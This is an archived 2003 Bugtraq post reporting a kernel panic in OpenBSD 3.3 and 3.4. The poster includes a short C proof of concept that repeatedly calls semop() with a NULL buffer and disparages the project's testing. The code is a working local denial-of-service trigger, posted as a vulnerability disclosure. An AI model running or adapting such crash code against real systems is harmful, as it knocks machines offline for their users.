[32531] in bugtraq

home help back first fref pref prev next nref lref last post

yet another panic() in OpenBSD

daemon@ATHENA.MIT.EDU (noir@uberhax0r.net)
Sat Nov 22 13:53:16 2003

Date: Fri, 21 Nov 2003 17:46:01 -0500 (EST)
From: noir@uberhax0r.net
To: bugtraq@securityfocus.com
Message-ID: <Pine.GSO.4.44.0311211744190.22851-100000@sodom.uberhax0r.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


a project lacking the basic QA and unit testing and here is the outcome:

#include <stdio.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/ipc.h>

int
main()
{
    int i;

        for(i = 0; i < 0x40; i++)
                semop(i, (struct sembuf *) NULL, 0);

}


PANIC in OpenBSD 3.3 and 3.4 is confirmed.


home help back first fref pref prev next nref lref last post